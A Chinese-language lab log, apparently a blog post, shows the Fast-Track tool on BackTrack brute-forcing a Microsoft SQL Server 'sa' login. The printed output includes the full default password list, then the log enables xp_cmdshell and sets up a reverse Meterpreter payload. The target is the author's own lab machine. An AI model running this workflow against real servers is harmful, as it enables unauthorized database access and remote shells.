(a)ttempt SQL Ping and Auto Quick Brute Force(未完待续)
在BT5R3上,需要修改文件/pentest/exploits/fasttrack/config/fasttrack_config,改为:
METASPLOIT_PATH=/opt/metasploit/app/
否则会找不到msfcli。
然后进入fasttrack进行操作:
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
***********************************************
******* Performing dependency checks... *******
***********************************************
*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.
Your system has all requirements needed to run Fast-Track!
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
Fast-Track Main Menu:
1. Fast-Track Updates
2. Autopwn Automation
3. Nmap Scripting Engine
4. Microsoft SQL Tools
5. Mass Client-Side Attack
6. Exploits
7. Binary to Hex Payload Converter
8. Payload Generator
9. Fast-Track Tutorials
10. Fast-Track Changelog
11. Fast-Track Credits
12. Exit Fast-Track
Enter the number: 4
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
Microsoft SQL Attack Tools
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
(q)uit
Enter your choice : 2
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
Enter the IP Address and Port Number to Attack.
Options: (a)ttempt SQL Ping and Auto Quick Brute Force
(m)ass scan and dictionary brute
(s)ingle Target (Attack a Single Target with big dictionary)
(f)ind SQL Ports (SQL Ping)
(i) want a command prompt and know which system is vulnerable
(v)ulnerable system, I want to add a local admin on the box...
(r)aw SQL commands to the SQL Server
(e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
(h)ost list file of IP addresses you want to attack
(q)uit
Enter Option: a
Enter username for SQL database (example:sa): sa
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 192.168.1.1/24
Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting in order to determine where the SQL servers are at. This could take quite a long time.
Do you want to perform advanced identification, yes or no: yes
这样设置好之后,就开始SQL ping了:
[-] Launching SQL Ping, this may take a while to footprint.... [-] [*] Please wait while we load the module tree... Brute forcing username: sa Be patient this could take awhile... Brute forcing password of password2 on IP 192.168.1.142:1433 Brute forcing password of on IP 192.168.1.142:1433 Brute forcing password of password on IP 192.168.1.142:1433 Brute forcing password of sqlserver on IP 192.168.1.142:1433 Brute forcing password of sql on IP 192.168.1.142:1433 Brute forcing password of password1 on IP 192.168.1.142:1433 Brute forcing password of password123 on IP 192.168.1.142:1433 Brute forcing password of complexpassword on IP 192.168.1.142:1433 Brute forcing password of database on IP 192.168.1.142:1433 Brute forcing password of server on IP 192.168.1.142:1433 Brute forcing password of changeme on IP 192.168.1.142:1433 Brute forcing password of change on IP 192.168.1.142:1433 Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433 Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433 Brute forcing password of Sqlserver on IP 192.168.1.142:1433 Brute forcing password of SqlServer on IP 192.168.1.142:1433 Brute forcing password of Password1 on IP 192.168.1.142:1433 Brute forcing password of Password2 on IP 192.168.1.142:1433 Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433 Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433 Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433 Brute forcing password of P@ssword! on IP 192.168.1.142:1433 Brute forcing password of Password! on IP 192.168.1.142:1433 Brute forcing password of password! on IP 192.168.1.142:1433 Brute forcing password of sqlsvr on IP 192.168.1.142:1433 Brute forcing password of sqlaccount on IP 192.168.1.142:1433 Brute forcing password of account on IP 192.168.1.142:1433 Brute forcing password of sasa on IP 192.168.1.142:1433 Brute forcing password of sa on IP 192.168.1.142:1433 Brute forcing password of administator on IP 192.168.1.142:1433 Brute forcing password of pass on IP 192.168.1.142:1433 Brute forcing password of sql on IP 192.168.1.142:1433 Brute forcing password of sqlsql on IP 192.168.1.142:1433 Brute forcing password of microsoft on IP 192.168.1.142:1433 Brute forcing password of sqlserver on IP 192.168.1.142:1433 Brute forcing password of sa on IP 192.168.1.142:1433 Brute forcing password of sasa on IP 192.168.1.142:1433 Brute forcing password of welcome on IP 192.168.1.142:1433 Brute forcing password of sqlpass on IP 192.168.1.142:1433 Brute forcing password of sqlpassword on IP 192.168.1.142:1433 Brute forcing password of guessme on IP 192.168.1.142:1433 Brute forcing password of bird on IP 192.168.1.142:1433 Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433 Brute forcing password of test on IP 192.168.1.142:1433 Brute forcing password of dev on IP 192.168.1.142:1433 Brute forcing password of qa on IP 192.168.1.142:1433 Brute forcing password of god on IP 192.168.1.142:1433 Brute forcing password of sysadmin on IP 192.168.1.142:1433 Brute forcing password of water on IP 192.168.1.142:1433 Brute forcing password of dirt on IP 192.168.1.142:1433 Brute forcing password of air on IP 192.168.1.142:1433 Brute forcing password of earth on IP 192.168.1.142:1433 Brute forcing password of company on IP 192.168.1.142:1433 Brute forcing password of secret on IP 192.168.1.142:1433 Brute forcing password of sqlpass123 on IP 192.168.1.142:1433 Brute forcing password of 123456 on IP 192.168.1.142:1433 Brute forcing password of abcd123 on IP 192.168.1.142:1433 Brute forcing password of abc on IP 192.168.1.142:1433 Brute forcing password of burp on IP 192.168.1.142:1433 Brute forcing password of private on IP 192.168.1.142:1433 Brute forcing password of unknown on IP 192.168.1.142:1433 Brute forcing password of wicked on IP 192.168.1.142:1433 Brute forcing password of alpine on IP 192.168.1.142:1433 Brute forcing password of trust on IP 192.168.1.142:1433 Brute forcing password of microsoft on IP 192.168.1.142:1433 Brute forcing password of sql2000 on IP 192.168.1.142:1433 Brute forcing password of sql2003 on IP 192.168.1.142:1433 Brute forcing password of sql2005 on IP 192.168.1.142:1433 Brute forcing password of sql2008 on IP 192.168.1.142:1433 Brute forcing password of vista on IP 192.168.1.142:1433 Brute forcing password of xp on IP 192.168.1.142:1433 Brute forcing password of nt on IP 192.168.1.142:1433 Brute forcing password of 98 on IP 192.168.1.142:1433 Brute forcing password of 95 on IP 192.168.1.142:1433 Brute forcing password of 2003 on IP 192.168.1.142:1433 Brute forcing password of 2008 on IP 192.168.1.142:1433 Sorry the brute force attack was unsuccessful. Better luck next time!
fasttrack成功得找到了mssql2k的IP:192.168.1.142,但是没猜对密码,接下来我修改一下密码,使得它可以成功。
然后继续sql ping:
Brute forcing username: sa
Be patient this could take awhile...
Brute forcing password of password2 on IP 192.168.1.142:1433
Brute forcing password of on IP 192.168.1.142:1433
Brute forcing password of password on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of password1 on IP 192.168.1.142:1433
Brute forcing password of password123 on IP 192.168.1.142:1433
SQL Server Compromised: "sa" with password of: "password123" on IP 192.168.1.142:1433
Brute forcing password of complexpassword on IP 192.168.1.142:1433
Brute forcing password of database on IP 192.168.1.142:1433
Brute forcing password of server on IP 192.168.1.142:1433
Brute forcing password of changeme on IP 192.168.1.142:1433
Brute forcing password of change on IP 192.168.1.142:1433
Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433
Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433
Brute forcing password of Sqlserver on IP 192.168.1.142:1433
Brute forcing password of SqlServer on IP 192.168.1.142:1433
Brute forcing password of Password1 on IP 192.168.1.142:1433
Brute forcing password of Password2 on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of P@ssword! on IP 192.168.1.142:1433
Brute forcing password of Password! on IP 192.168.1.142:1433
Brute forcing password of password! on IP 192.168.1.142:1433
Brute forcing password of sqlsvr on IP 192.168.1.142:1433
Brute forcing password of sqlaccount on IP 192.168.1.142:1433
Brute forcing password of account on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of administator on IP 192.168.1.142:1433
Brute forcing password of pass on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of sqlsql on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of welcome on IP 192.168.1.142:1433
Brute forcing password of sqlpass on IP 192.168.1.142:1433
Brute forcing password of sqlpassword on IP 192.168.1.142:1433
Brute forcing password of guessme on IP 192.168.1.142:1433
Brute forcing password of bird on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of test on IP 192.168.1.142:1433
Brute forcing password of dev on IP 192.168.1.142:1433
Brute forcing password of qa on IP 192.168.1.142:1433
Brute forcing password of god on IP 192.168.1.142:1433
Brute forcing password of sysadmin on IP 192.168.1.142:1433
Brute forcing password of water on IP 192.168.1.142:1433
Brute forcing password of dirt on IP 192.168.1.142:1433
Brute forcing password of air on IP 192.168.1.142:1433
Brute forcing password of earth on IP 192.168.1.142:1433
Brute forcing password of company on IP 192.168.1.142:1433
Brute forcing password of secret on IP 192.168.1.142:1433
Brute forcing password of sqlpass123 on IP 192.168.1.142:1433
Brute forcing password of 123456 on IP 192.168.1.142:1433
Brute forcing password of abcd123 on IP 192.168.1.142:1433
Brute forcing password of abc on IP 192.168.1.142:1433
Brute forcing password of burp on IP 192.168.1.142:1433
Brute forcing password of private on IP 192.168.1.142:1433
Brute forcing password of unknown on IP 192.168.1.142:1433
Brute forcing password of wicked on IP 192.168.1.142:1433
Brute forcing password of alpine on IP 192.168.1.142:1433
Brute forcing password of trust on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sql2000 on IP 192.168.1.142:1433
Brute forcing password of sql2003 on IP 192.168.1.142:1433
Brute forcing password of sql2005 on IP 192.168.1.142:1433
Brute forcing password of sql2008 on IP 192.168.1.142:1433
Brute forcing password of vista on IP 192.168.1.142:1433
Brute forcing password of xp on IP 192.168.1.142:1433
Brute forcing password of nt on IP 192.168.1.142:1433
Brute forcing password of 98 on IP 192.168.1.142:1433
Brute forcing password of 95 on IP 192.168.1.142:1433
Brute forcing password of 2003 on IP 192.168.1.142:1433
Brute forcing password of 2008 on IP 192.168.1.142:1433
*******************************************
The following SQL Servers were compromised:
*******************************************
1. 192.168.1.142:1433 *** U/N: sa P/W: password123 ***
*******************************************
To interact with system, enter the SQL Server number.
Example: 1. 192.168.1.32 you would type 1
Enter the number: 1
Specify payload:
1. Standard Command Prompt
2. Metasploit Reverse VNC TCP (Requires Metasploit)
3. Metasploit Meterpreter (Requires Metasploit)
4. Metasploit Reflective VNC DLL Injection (Requires Metasploit)
Enter number here: 3
Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.
What port do you want the payload to connect to you on: 4444
Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..
这样,就发现了密码password123。但是接下来,并没有成功:
Sending payload: 6200 Metasploit payload delivered.. Converting our payload to binary, this may take a few... Cleaning up... Launching payload, this could take up to a minute... When finished, close the metasploit handler window to return to other compromised SQL Servers. Press enter to return back to compromised SQL Servers.
还要看看代码,调试一下,明天再搞。